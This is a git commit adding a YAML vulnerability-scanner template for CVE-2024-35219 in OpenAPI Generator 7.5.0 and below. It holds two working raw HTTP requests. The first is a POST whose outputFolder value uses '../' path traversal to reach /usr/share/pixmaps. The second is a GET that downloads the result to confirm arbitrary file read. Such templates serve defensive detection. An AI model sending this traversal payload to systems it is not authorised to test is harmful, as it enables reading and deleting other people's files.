Create CVE-2024-35219.yaml

2024-11-11 21:29:19 +05:30 · 2024-11-11 21:29:19 +05:30 · cb6450ea1b
parent 63b8abf5d8
commit cb6450ea1b
1 changed files with 71 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-35219.yaml
+++ b/http/cves/2024/CVE-2024-35219.yaml
@ -0,0 +1,71 @@
+id: CVE-2024-35219
+
+info:
+  name: OpenAPI Generator <= 7.5.0 - Arbitrary File Read/Delete
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: high
+  description: |
+    OpenAPI Generator versions 7.5.0 and below are prone to an Arbitrary File Read/Delete vulnerability. Attackers can exploit this vulnerability to read and delete files and folders from an arbitrary, writable directory.
+  reference:
+    - https://www.sonarsource.com/blog/the-power-of-taint-analysis-uncovering-critical-code-vulnerability-in-openapi-generator/
+    - https://github.com/OpenAPITools/openapi-generator/commit/edbb021aadae47dcfe690313ce5119faf77f800d
+    - https://github.com/OpenAPITools/openapi-generator/pull/18652
+    - https://github.com/OpenAPITools/openapi-generator/security/advisories/GHSA-g3hr-p86p-593h
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H
+    cvss-score: 8.3
+    cve-id: CVE-2024-35219
+    cwe-id: CWE-22
+    epss-score: 0.00045
+    epss-percentile: 0.16725
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2024,openapi,intrusive,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /api/gen/clients/csharp HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "authorizationValue": {
+            "keyName": "string",
+            "type": "string",
+            "value": "string"
+          },
+         "openAPIUrl": "https://raw.githubusercontent.com/OpenAPITools/openapi-generator/master/modules/openapi-generator/src/test/resources/2_0/petstore.yaml",
+           "options": {"outputFolder":"../../../../../../usr/share/pixmaps/"},
+          "spec": {}
+        }
+    matchers:
+      - type: word
+        part: body
+        words:
+          - code
+          - link
+        condition: and
+        internal: true
+
+    extractors:
+          - type: json
+            name: code
+            internal: true
+            json:
+              - '.code'
+            part: body
+
+  - raw:
+      - |
+        GET /api/gen/download/{{code}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "pixmaps/debian-logo.png"